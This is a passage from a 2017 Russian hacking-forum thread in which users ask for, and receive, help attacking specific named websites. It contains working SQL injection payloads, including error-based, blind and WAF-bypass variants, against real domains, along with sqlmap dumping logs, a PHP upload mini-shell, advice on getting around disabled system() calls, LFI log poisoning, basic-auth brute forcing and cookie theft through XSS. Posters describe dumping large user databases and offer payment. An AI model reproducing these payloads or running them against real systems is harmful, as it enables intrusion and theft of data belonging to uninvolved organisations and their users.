Вход

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 [9] 10 11 12

crlf
09.08.2017, 21:06
kacergei said:
↑ (https://antichat.live/posts/4115204/)
Ранее с таким не сталкивался, потому вопрос может быть очень глупым
)))
Выполняю это на удаленной машине, что бы сохранить файл на свой ПК (указывая его как удалённый)
"cat > vda_image"
я правильно понял что могу указать папку сохранения своего ПК, для примера: dd if=/dev/vda | ssh
root@xxx.xxx.xxx.xx (mailto:root@xxx.xxx.xxx.xx)
-p22 "cat > /root/folder_on_my_computer/vda_image_file"
Я верно понял?
P.S> как узнать предположительный размер конечного файла?
Дабы решить на какую удаленную лить (место не резиновое =) )


Да, можно указать любой путь на удалённой машине. Судя по df -h /dev/vda1имеет размер 30G, образ будет такого же размера. Можно ещё попутно жатьgzip-ом, размер должен быть меньше.

BabaDook
11.08.2017, 20:08
Цветные, помогите


Code:
http://health.ri.gov/licenses/detail.php?id=248++1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15

cat1vo
11.08.2017, 21:10
BabaDook said:
↑ (https://antichat.live/posts/4115878/)
Цветные, помогите

Code:
http://health.ri.gov/licenses/detail.php?id=248++1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15





Code:
detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -

Как вариант вывести через ошибку БД, но не забывай заключать оператор select в /*!select*/, там на него ругается!

BabaDook
11.08.2017, 21:14
cat1vo said:
↑ (https://antichat.live/posts/4115906/)

Code:
detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -

Как вариант вывести через ошибку БД, но не забывай заключать оператор select в
/*!
select
*/
, там на него ругается!


Спасибо, а можешь любую таблицу вывести, а то я не оч понимаю этот синтекс, а так по твоему примеру буду пробовать разбираться. Спасибо.

t0ma5
11.08.2017, 21:26
cat1vo said:
↑ (https://antichat.live/posts/4115906/)

Code:
detail.php?id=248=0 group by mid(version(),rand(0)|0)having min(0)-- -

Как вариант вывести через ошибку БД, но не забывай заключать оператор select в
/*!
select
*/
, там на него ругается!


там всё что после /**/ как будто не уходит в запрос

?id=248/**/werwer - валидная страница

?id=248=0 group by mid(/*!select(version())*/,rand(0)|0)having min(0)-- - - запрос падает

GYK
15.08.2017, 02:10
Здравствуйте, я бы хотел узнать об XSS уязвимостях, а именно как их использовать, если стоит фильтр, просто алерт работает а вот более сложные скрипты со сниффером - фильтруются, и еще на счет сниффера, есть ли такие, которые работают, когда жертва просто видит картинку, и нажатия не требуется, я в этом плохо разбираюсь, также на счет шелка, есть ли беспалевные, просто на какой бы хостинг я бы не ставил, тут же блокируют, или шелл просто ее работает, может хостинги сеть, на которых они не садятся какие-то?

r1l
15.08.2017, 17:18
Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной

Что можно предпринять, что бы хоть как то заставить сливаться быстрее?

Gorev
15.08.2017, 17:51
r1l said:
↑ (https://antichat.live/posts/4117050/)
Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной
Что можно предпринять, что бы хоть как то заставить сливаться быстрее?


А чем сливаешь?

r1l
15.08.2017, 19:17
Gorev said:
↑ (https://antichat.live/posts/4117057/)
А чем сливаешь?


sqlmap как и всегда

cat1vo
15.08.2017, 19:56
r1l said:
↑ (https://antichat.live/posts/4117050/)
Нашел жирный сайт, по после 200к(фул 1.3кк) строк слива очень падает скорость до нереальной
Что можно предпринять, что бы хоть как то заставить сливаться быстрее?


DIOS - Dump In One Shot (https://defcon.ru/web-security/2320/)

r1l
15.08.2017, 20:04
cat1vo said:
↑ (https://antichat.live/posts/4117102/)
DIOS -
Dump In One Shot (https://defcon.ru/web-security/2320/)


для "Union Base"

у меня error base

да и если бы уязвимость была union я бы и мапом наверное в один клик слил

Может там шел можно как то залить, я ни разу этого не делал

oposor
16.08.2017, 12:11
Привет всем!

Сразу извините за тупой вопрос.

Мб я пишу не в ту тему. Вообщем проблема такова , есть сайт medstat.*uva.ru ( *t )который можно войти только через сеть поликлиники,а через любую другую сеть никак не могу вломиться,пробывал VPN,TOR,ПРОКСИ не помогает.

Как войти на этот сайт?

Gorev
16.08.2017, 15:02
r1l said:
↑ (https://antichat.live/posts/4117086/)
sqlmap как и всегда


Количество потоков(хинт)

Xsite
17.08.2017, 16:53
Ребят подскажите или помогите

1. есть сайт , на нем скуля Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) , в post запросе

2.Если начинать --dump , сыпятся куча ошибок и он не может сдампить даже пару строк (уменьшал увеличивал кол-во потоков ,делей ,запускал с ключом -o ) Все одно и тоже ,я думаю это из-за кол-во записей в таблице юзеров

3. Стал смотреть --is-dba , оказалось false

4. Чекнул Ip yf 3306 порт мускула ,но о5 же нет

5.Нашел таблицу с админами , нашел пасс мыло и нейм ,но пасс судя по всему расшифровке не подлежит ,так как $P$BpL/N0jM5uZ.rjNf.dQXCJEfZ.D0FN/ , засунул на cmd5 ,тоже тишина , но вроде как форму логина для админов нашел ,но это тоже ничего не дает

6. искал пхпмайадмин ,поиски ничего не дали

Задача сдампить

Вопрос: как ?)

VCL
18.08.2017, 21:13
С андройда при помощи csploit наловил трафика и сохранил в pcap . Юзнул Wireshark и с помощью фильтра: wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol

отделил от мусора .

Дальше в мануале было сказано запустить Elcomsoft Wireless Security Auditor закинуть наш отсортированный файл и атаковать .

Когда начинаю закидывать файл EWSA начинает ругаться , что файл либо не того формата либо в нем нет того что нужно .

Вопрос что же я делаю неправильно ? =(

Hedorda
18.08.2017, 21:39
Xsite said:
↑ (https://antichat.live/posts/4117972/)
Ребят подскажите или помогите
1. есть сайт , на нем скуля Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) , в post запросе
2.Если начинать --dump , сыпятся куча ошибок и он не может сдампить даже пару строк (уменьшал увеличивал кол-во потоков ,делей ,запускал с ключом -o ) Все одно и тоже ,я думаю это из-за кол-во записей в таблице юзеров
3. Стал смотреть --is-dba , оказалось false
4. Чекнул Ip yf 3306 порт мускула ,но о5 же нет
5.Нашел таблицу с админами , нашел пасс мыло и нейм ,но пасс судя по всему расшифровке не подлежит ,так как $P$BpL/N0jM5uZ.rjNf.dQXCJEfZ.D0FN/ , засунул на cmd5 ,тоже тишина , но вроде как форму логина для админов нашел ,но это тоже ничего не дает
6. искал пхпмайадмин ,поиски ничего не дали
Задача сдампить
Вопрос: как ?)


А попробуй всё руками сделать... SQLMAP показывает свои запросы.

karkajoi
19.08.2017, 16:39
Вот такая беда, мини шел работает, могу вывести phpinfo, но есть делаю запрос cmd=system('ls -la'); то выдает ощибку

Warning: system() has been disabled for security reasons

я так понял она выключена в php.ini

как можно обойти?

st55
19.08.2017, 17:25
karkajoi said:
↑ (https://antichat.live/posts/4118816/)
Вот такая беда, мини шел работает, могу вывести phpinfo, но есть делаю запрос cmd=system('ls -la'); то выдает ощибку
Warning
: system() has been disabled for security reasons
я так понял она выключена в php.ini
как можно обойти?


shell_exec(), exec().

SooLFaa
20.08.2017, 17:01
cat1vo said:
↑ (https://antichat.live/posts/4117102/)
DIOS -
Dump In One Shot (https://defcon.ru/web-security/2320/)


Быстрее ты задосишь сайт, чем сольешь его такой техникой такой объем данных

st55
20.08.2017, 18:23
SooLFaa said:
↑ (https://antichat.live/posts/4119108/)
Быстрее ты задосишь сайт, чем сольешь его такой техникой такой объем данных


Если у сайта есть возможность держать и работать с таким объёмом данных, скорей всего пропускная способность чуть выше.

SooLFaa
20.08.2017, 18:30
st55 said:
↑ (https://antichat.live/posts/4119146/)
Если у сайта есть возможность держать и работать с таким объёмом данных, скорей всего пропускная способность чуть выше.


Это проверено. DIOS делается рекурсивными зхапросами если бы ты посмотрел на запрос. И данные в миллион ты не выведешь, в лучшем случае упадешь по таймауту. А то сколько он может хранить это не зависит от мощности.

cat1vo
20.08.2017, 19:57
SooLFaa said:
↑ (https://antichat.live/posts/4119150/)
Это проверено. DIOS делается рекурсивными зхапросами если бы ты посмотрел на запрос. И данные в миллион ты не выведешь, в лучшем случае упадешь по таймауту. А то сколько он может хранить это не зависит от мощности.


В чем проблема сделать 100 запросов по 10к строк вывода? И ничего не упадет, на личном опыте сливал и куда больше строк через DIOS, но конечно не 1кк строк за раз (что за бред), а разбив на меньший объем, но у человека совсем другая ситуация!

SooLFaa
20.08.2017, 19:58
cat1vo said:
↑ (https://antichat.live/posts/4119175/)
В чем проблема сделать 100 запросов по 10к строк вывода? И ничего не упадет, на личном опыте сливал и куда больше строк через DIOS, но конечно не 1кк строк за раз (что за бред), а разбив на меньший объем, но у человека совсем другая ситуация!


А вот это очень хорошее и грамотное дополнение...

r1l
20.08.2017, 23:58
А тут помогают раскрутить?


http://www.fcbahis.net//stats.php?listcount=1'"&month=2010-09&page=1&style=month&tipster=71 (http://www.fcbahis.net//stats.php?listcount=1%27%22&month=2010-09&page=1&style=month&tipster=71)


Нашел уязвимость, но как я только не пытался крутить.. бесполезно

параметр listcount

Или это обычная ошибка синтаксиса, а я голову ломаю?

Hedorda
21.08.2017, 02:39
Ребята, недавно на одном из пабликов узнал о дополнении Tamper Data. Есть ещё что-нибудь подобное?

cat1vo
21.08.2017, 04:23
Hedorda said:
↑ (https://antichat.live/posts/4119277/)
Ребята, недавно на одном из пабликов узнал о дополнении Tamper Data. Есть ещё что-нибудь подобное?


Да, Burp suite, ZAP proxy, Charles etc

DezMond™
22.08.2017, 14:57
Помогите вывод сделать, на фильтр не похоже..


Code:
https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'+order+by+57+--+

Shubka75
22.08.2017, 15:48
DezMond™ said:
↑ (https://antichat.live/posts/4119895/)
Помогите вывод сделать, на фильтр не похоже..

Code:
https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'+order+by+57+--+



Стоит ограничение на количество символов в переменной, так что крутить получится только как слепую


Code:
https://www.p2p.tu-darmstadt.de/publications/details/?no_cache=1&tx_bibtex_pi1%5Bpub_id%5D=TUD-CS-2014-0992'or mid(database(),1,1)='t';%00

ghost8
23.08.2017, 00:40
karkajoi said:
↑ (https://antichat.live/posts/4118816/)
Вот такая беда, мини шел работает, могу вывести phpinfo, но есть делаю запрос cmd=system('ls -la'); то выдает ощибку
Warning
: system() has been disabled for security reasons
я так понял она выключена в php.ini
как можно обойти?


Пробуй файл записать


Code:
cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

z0mbie86
24.08.2017, 13:24
Извините если не в том разделе,

возникла проблема с Microsoft SQL Server/Sybase stacked queries (comment)

Дело в том, что я с помощью sqlmap вытаскиваю список баз, таблицы, текущий пользователь, но никак не получается вытащить колонки и инфу из таблиц.

На каждую таблицу sqlmap предлагает брутить колонки, а на инфу говорит что таблица содержит 0 строк (Колонки указывал вручную. т.к. знаю что в некоторых таблицах есть такая)

Направьте на путь истинный, подскажите методы решения.

Запрос sqlmap -r "file.txt" --random-agent --tor --time-sec=50 --dbms=MsSQL

DezMond™
28.08.2017, 23:23
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=176+select+union+111+--+

Злой waf так пускает, а как надо - хер! как обойти?

cat1vo
29.08.2017, 23:58
DezMond™ said:
↑ (https://antichat.live/posts/4122102/)
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=176+select+union+111+--+
Злой waf так пускает, а как надо - хер! как обойти?




Code:
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=-176+UniOn%0B/*hjh%0B%0Bijhi%0Bokihuygtfryujiko%0Biuytreftgyhuji k%0Bijuhygtfrderftgyhujik%0Bokijuhygtfrftgyhuji%0B iuytrftgyh%0B*/Select+%20version/*asd*/()+--+

@BabaDook (https://antichat.live/members/263150/) обошел Waf, но как я понял были проблемы с выводом версии и тд, не знаю почему не отписал сюда. Версию вывели, дальше сам!

Ergebnisse der Volltextsuche zu "5.5.27"

DezMond™
30.08.2017, 14:44
cat1vo said:
↑ (https://antichat.live/posts/4122429/)

Code:
http://www.arboe.at/index.php?id=9528&origin=search&no_cache=1&catId=-176+UniOn%0B/*hjh%0B%0Bijhi%0Bokihuygtfryujiko%0Biuytreftgyhuji k%0Bijuhygtfrderftgyhujik%0Bokijuhygtfrftgyhuji%0B iuytrftgyh%0B*/Select+%20version/*asd*/()+--+

@
BabaDook (https://antichat.live/members/263150/)
обошел Waf, но как я понял были проблемы с выводом версии и тд, не знаю почему не отписал сюда. Версию вывели, дальше сам!
Ergebnisse der Volltextsuche zu "
5.5.27
"


from фильтрует, пытался скрыть кодировкой,пробелами,комен тами, регистром, ни чё не помогает( может у кого то получится...

kacergei
31.08.2017, 21:35
Ребят кто сможет подсказать с этими двумя урлами

Ошибка есть

Но что только не пробовал глухо((


Code:
http://www[.]teraxpress[.]com/index.php?route=extension/module/merchant_profile&merchant_id=65
http://www[.]teraxpress[.]com/index.php?route=extension/module/merchantlogo/getStoreCategory&vpath=3&sort=pd.name&order=ASC&merchant_id=3&limit=25

Lesanglier
02.09.2017, 22:54
всем доброго времени.

на админке стоит http basic authentication

читал что можно перехватить login : password в формате base64

.SpoilerTarget" type="button">Spoiler


Code:
GET /administrator/ HTTP/1.1
Connection: keep-alive
Cache-Control: max-age=0
Authorization: Basic NDUzdDo1NHQ=
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,en-US;q=0.8,en;q=0.6
X-Compress: null
Cookie: ring=840b4f0c8e5d64ca6d2fe74dead87a4c; _ym_uid=1504109674995456289; city=25; region=104; visitor=e88e905cdaad3d67f0c6df4765c34a76c1e7d4eec4 a3cc8e44345b11c108c473; _ga=GA1.3.2065729496.1504109674; PHPSESSID=4o4ui8jeikerke04dmltqtdcp0; pastafarian=c4e5bfebfbbf5abeb2936bb31ec61403863880 55110b8debd270cbf7c755644d; winter=11457.59a6e778e6cd71.61786604; _ym_isad=1; _ga=GA1.2.2065729496.1504109674; _gid=GA1.2.994183403.1504355776


Authorization: Basic NDUzdDo1NHQ=

DezMond™
03.09.2017, 14:50
Code:
http://www.rgre.de/rgre-partnerschaften/index.php?dt_orgname=&dt_plz=&dt_einwohnerzahl_min=&dt_einwohnerzahl_max=&dt_bundesland=&aus_orgname=&aus_plz=&aus_kontinent=&partner_seit_von=&partner_seit_bis=&partner_form=&submit=Suche&aus_land=GR&order_by=land'

чёт туплю, не могу вывод сделать(

SooLFaa
04.09.2017, 00:33
[QUOTE="Lesanglier"]
Lesanglier said:
↑ (https://antichat.live/posts/4123601/)
всем доброго времени.
на админке стоит http basic authentication
читал что можно перехватить login : password в формате base64
Spoiler

Code:
GET /administrator/ HTTP/1.1
Connection: keep-alive
Cache-Control: max-age=0
Authorization: Basic NDUzdDo1NHQ=
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,en-US;q=0.8,en;q=0.6
X-Compress: null
Cookie: ring=840b4f0c8e5d64ca6d2fe74dead87a4c; _ym_uid=1504109674995456289; city=25; region=104; visitor=e88e905cdaad3d67f0c6df4765c34a76c1e7d4eec4 a3cc8e44345b11c108c473; _ga=GA1.3.2065729496.1504109674; PHPSESSID=4o4ui8jeikerke04dmltqtdcp0; pastafarian=c4e5bfebfbbf5abeb2936bb31ec61403863880 55110b8debd270cbf7c755644d; winter=11457.59a6e778e6cd71.61786604; _ym_isad=1; _ga=GA1.2.2065729496.1504109674; _gid=GA1.2.994183403.1504355776

Authorization: Basic NDUzdDo1NHQ=

Lesanglier
04.09.2017, 18:40
SooLFaa said:
↑ (https://antichat.live/posts/4123916/)
Абсолютно верно. Логин и пароль указаны в кодировке base64. По поводу перехватить - если ты не в одной сети с жервтой будет сложно. Зато брутится очень легко.


burp справится хорошо или лучше другим софтом?

SooLFaa
04.09.2017, 18:48
Lesanglier said:
↑ (https://antichat.live/posts/4124135/)
burp справится хорошо или лучше другим софтом?


Я гидрой бручу basic. Но у меня то сервер. А так на вкус и цвет.

BabaDook
08.09.2017, 14:38
DezMond™ said:
↑ (https://antichat.live/posts/4123720/)

Code:
http://www.rgre.de/rgre-partnerschaften/index.php?dt_orgname=&dt_plz=&dt_einwohnerzahl_min=&dt_einwohnerzahl_max=&dt_bundesland=&aus_orgname=&aus_plz=&aus_kontinent=&partner_seit_von=&partner_seit_bis=&partner_form=&submit=Suche&aus_land=GR&order_by=land'

чёт туплю, не могу вывод сделать(


Я не виду там инъекции. Может я тоже туплю. Кидай ещё сайты

preno
09.09.2017, 15:06
Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf

фильтр на _

Как обойти?

принципиально важно обойти именно в нем ограничение

DezMond™
09.09.2017, 17:38
preno said:
↑ (https://antichat.live/posts/4126012/)

Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf

фильтр на _
Как обойти?
принципиально важно обойти именно в нем ограничение


%255F

preno
09.09.2017, 18:33
preno said:
↑ (https://antichat.live/posts/4126012/)

Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf

фильтр на _
Как обойти?
принципиально важно обойти именно в нем ограничение




DezMond™ said:
↑ (https://antichat.live/posts/4126047/)
%255F


хотелось бы на конкретном примере. у меня не получается

DezMond™
09.09.2017, 18:39
Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf%255F

preno
09.09.2017, 18:44
DezMond™ said:
↑ (https://antichat.live/posts/4126066/)

Code:
http://www.thewinecompanyonline.com.sg/index.php?route=product/category&path=168_169%27fghf%255F



Получаем %5F

SQL не крутится

Тот_самый_Щуп
09.09.2017, 18:48
DezMond™ (https://antichat.live/members/47856/), учи матчасть про двойной urlencode, потом советуй.

foozzione
15.09.2017, 18:53
на сайте с wordpress есть плашин старый с вулном - https://www.exploit-db.com/exploits/36414/

Немного не понял как реализовать например sql inj, никто не сталкивался? Мб и я туплю.

За помощь в реализации, готов отблагоодарить хорошо

winstrool
15.09.2017, 19:20
foozzione said:
↑ (https://antichat.live/posts/4128489/)
на сайте с wordpress есть плашин старый с вулном -
https://www.exploit-db.com/exploits/36414/
Немного не понял как реализовать например sql inj, никто не сталкивался? Мб и я туплю.
За помощь в реализации, готов отблагоодарить хорошо


Вместо your.wordpress.blog ставите адрес своего сайта, но не плохо было бы, сначало чекнуть сайт на уязвимость хотя бы наличием той же Reflected XSS

foozzione
15.09.2017, 19:59
winstrool said:
↑ (https://antichat.live/posts/4128499/)
Вместо your.wordpress.blog ставите адрес своего сайта, но не плохо было бы, сначало чекнуть сайт на уязвимость хотя бы наличием той же Reflected XSS


тут я понял, что адрес то нужен свой,дело в том, что плагин есть и он уязвим, а вот как грамотно чекнуть, тут проблема. По этому прошу помощи.

winstrool
15.09.2017, 20:46
foozzione said:
↑ (https://antichat.live/posts/4128522/)
тут я понял, что адрес то нужен свой,дело в том, что плагин есть и он уязвим, а вот как грамотно чекнуть, тут проблема. По этому прошу помощи.


Парсите тело ответа

foozzione
15.09.2017, 20:49
winstrool said:
↑ (https://antichat.live/posts/4128548/)
Парсите тело ответа


то есть в случае с Reflected XSS via HTTP referer,я должен отправить похожую форму:


HTML:



с реферером: ?lang=en">alert("hello");

Но, на сайте как я понял у них есть реврайт, язык переключается просто site.ru/en, а при попытке ?lang=en ведет на страницу с новостями/постами...

Octavian
18.09.2017, 02:39
Mozilla выдает


Code:
Apple

Burp выдает


Code:
alert(1)abys9=1&sb=88">Apple

Я так понимаю мешает URL ENCODE как эксплуатируется?

crlf
19.09.2017, 20:33
Octavian said:
↑ (https://antichat.live/posts/4129292/)
Я так понимаю мешает URL ENCODE как эксплуатируется?


Internet Explorer


foozzione said:
↑ (https://antichat.live/posts/4128551/)
Но, на сайте как я понял у них есть реврайт, язык переключается просто site.ru/en, а при попытке ?lang=en ведет на страницу с новостями/постами...


Если рефер не чекается, то отправить можно со своего хоста.

foozzione
19.09.2017, 20:48
crlf said:
↑ (https://antichat.live/posts/4130023/)
Internet Explorer
Если рефер не чекается, то отправить можно со своего хоста.


Искусственно поставить рефер?

crlf
19.09.2017, 22:06
foozzione said:
↑ (https://antichat.live/posts/4130034/)
Искусственно поставить рефер?


С подготовленной страницы перенаправить.

Octavian
19.09.2017, 22:38
crlf said:
↑ (https://antichat.live/posts/4130023/)
Internet Explorer
Если рефер не чекается, то отправить можно со своего хоста.


Типа URL ENCODE explorerне делает

crlf
19.09.2017, 22:39
Octavian said:
↑ (https://antichat.live/posts/4130074/)
Типа URL ENCODE explorerне делает


типа да, не энкодит

Octavian
19.09.2017, 22:43
crlf said:
↑ (https://antichat.live/posts/4130076/)
типа да, не энкодит


А в MOZILLA?

crlf
19.09.2017, 22:44
Octavian said:
↑ (https://antichat.live/posts/4130078/)
А в MOZILLA?


А в мозилла энкодит и ничего с этим не поделаешь!

Octavian
19.09.2017, 22:47
crlf said:
↑ (https://antichat.live/posts/4130079/)
А в мозилла энкодит и ничего с этим не поделаешь!


Почему это делается в даном случае ? ведь есть работающие GET XSS в Chrome, Mozilla

crlf
19.09.2017, 23:11
Octavian said:
↑ (https://antichat.live/posts/4130083/)
Почему это делается в даном случае ? ведь есть работающие GET XSS в Chrome, Mozilla


https://security.elarlang.eu/request-uri-query-string-and-url-encoding.html

billybonse
20.09.2017, 21:39
Привет всем читающим.

Нужна помощь. (Сразу извиняюсь, если задаю глупый вопрос)

Нашел lfi, пытаюсь раскрутить.

/proc/self/environ не работает

cmdline - /usr/sbin/httpd

В httpd.conf:

httpd.conf - ErrorLog logs/error_log

Перебирал различные пути, не нашел

Попробовал так (https://antichat.live/threads/232773/):

GET /epicfaaaaaail.php?

Обращаюсь - /proc/self/fd/8%00&cmd=ls%00

Выдает что-то странное:

PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20

[error] [client x.x.x.x] File does not exist: /local/.../robots.txt

[error] [client x.x.x.x] File does not exist: /local/.../nonlinear

[error] [client x.x.x.x] File does not exist: /local/.../nonlinear

PHP Fatal error: Call to undefined function: getsubtitle() in /local/.../index.php on line 20


В каком направлении копать?

crlf
20.09.2017, 22:45
billybonse said:
↑ (https://antichat.live/posts/4130417/)
GET /epicfaaaaaail.php?


Пейлод нужно в юзерагенте передавать. Так же, можно попробовать подцепить сессию и посмотреть что туда можно загнать.

https://rdot.org/forum/showthread.php?t=343 много полезной инфы на тему.


billybonse said:
↑ (https://antichat.live/posts/4130417/)
cmd=ls%00


Нулл байт не нужен.

billybonse
20.09.2017, 23:18
crlf said:
↑ (https://antichat.live/posts/4130438/)
Пейлод нужно в юзерагенте передавать


В соседней статье (https://antichat.live/threads/232773/):

"Ты пишешь мини шелл: , кодируешь всё в url, составляешь и отправляешь пакет:

POST httр://localhost/epicfaaaaaail.php?%3C%3Fphp+eval%28%24_GET%5Bcmd%5 D%29%3F%3E HTTP/1.1

Host: localhost

А кто? Кто это сделал? Сервер, приняв и обработав запрос, выдает 404 ошибку (о несуществующей страницы epicfaaaaaail.php), и записал это в error_log, выглядеть на сервере это стало так:

Code:

127.0.0.1 - [29/Sep/2010:13:55:36 -0700] "GET /epicfaaaaaail.php? HTTP/1.1" 404 2326

т.е. получается, обратившись к этому логу, PHP интерпретатор обработает всё докак обычный текст, а значит всё, шелл есть. Ты обращаешься к error_log: httр://localhost/?page=../../../etc/httpd/log/error_log&cmd=phpinfo();die(); и ничуть не удивившись видишь результат выполнения phpinfo()."

Для сессии нужна рега, если я не ошибаюсь, которой здесь нет.

crlf
20.09.2017, 23:34
billybonse said:
↑ (https://antichat.live/posts/4130452/)
В
соседней статье (https://antichat.live/threads/232773/)
:


Статью нужно перечитать ещё раз и подробно изучить тему по ссылке, которую я дал выше. У вас получилась мешанина из методов эксплуатации (procfs != логи).


billybonse said:
↑ (https://antichat.live/posts/4130452/)
Для сессии нужна рега, если я не ошибаюсь, которой здесь нет.


Не обязательно.

Muracha
26.09.2017, 19:53
Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php

На другой БД, в каталоге /blog/ крутиться worpdress.

Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)

Могу дать доступ, и если поможете - отблагодарю чисто символически.

Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...

Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?

zifus
26.09.2017, 20:16
Muracha said:
↑ (https://antichat.live/posts/4132330/)
Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php
На другой БД, в каталоге /blog/ крутиться worpdress.
Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
Могу дать доступ, и если поможете - отблагодарю чисто символически.
Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?


Посмотри в сторону load data local infile

blackbox
27.09.2017, 23:43
Muracha said:
↑ (https://antichat.live/posts/4132330/)
Есть доступ к базе данных на которой крутится малоинтересная база данных без возможности записи файла и каких-либо прав. Максимум что я смог сделать - это встроить джаву, создавать некоторые html формы и выводить их на страницу с расширением .php
На другой БД, в каталоге /blog/ крутиться worpdress.
Можно ли создать форму html используя javascript - чтобы прочитать внутренний файл config.php - и вообще, как прочитать этот файл при отсутствии прав на чтение и запись?(я бы давно залил шелл, но нет)
Могу дать доступ, и если поможете - отблагодарю чисто символически.
Помимо этого там есть самодельная фотогалерея, которая обращается к базе данных за именем файла. Сам файл лежит на сервере...
Можно наверное как-то подделать имя файлы, чтобы скрипт загрузил посторонний файл? Может были у кого подобные задачи или статьи на эту тему?


Тебе уже ответили https://dev.mysql.com/doc/refman/5.7/en/load-data.html но тут нужно знать полный путь к файлу, поэтому нужна еще ошибка раскрытия путей, с галереей может не получится, нужно смотреть каким образом она отображает картинку, скорее всего там будет проверка на то является ли файл корректным изображением. Если ты можешь встраивать JS в страницу, то можно попробовать угнать куки администратора сайта, правда я не знаю как там в Wordpess с этим дела обстоят сейчас.

WallHack
07.10.2017, 11:52
Была уязвимость error based, так крутил: seo-fast.ru/news'or(extractvalue(null,concat(0x3a,substr(load_ file(0x2f6574632f706173737764),-30,30))))=

Сейчас вывод ошибок отключен, но думаю там сейчас time based blind, помогите проверить.

slipknot13
14.10.2017, 20:36
как таблицы открыть

[19:41:45] [INFO] fetching current database

[19:41:45] [INFO] fetching tables for database: 'имя базы'

[19:41:45] [INFO] fetching number of tables for database 'имя базы'

[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>66

[19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>52

[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>48

[19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS

CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f

6b656e),1,1))>1

[19:41:47] [INFO] retrieved:

[19:41:47] [DEBUG] performed 4 queries in 1.62 seconds

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>66),SLEEP(10),9830)

[19:41:47] [WARNING] (case) time-based comparison requires larger statistical mo

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>170454),SLEEP(10),9830)

.

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>819325),SLEEP(10),9830)

.

[19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table

_name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786

3656c746f6b656e),1,1))>261031),SLEEP(10),9830)

.

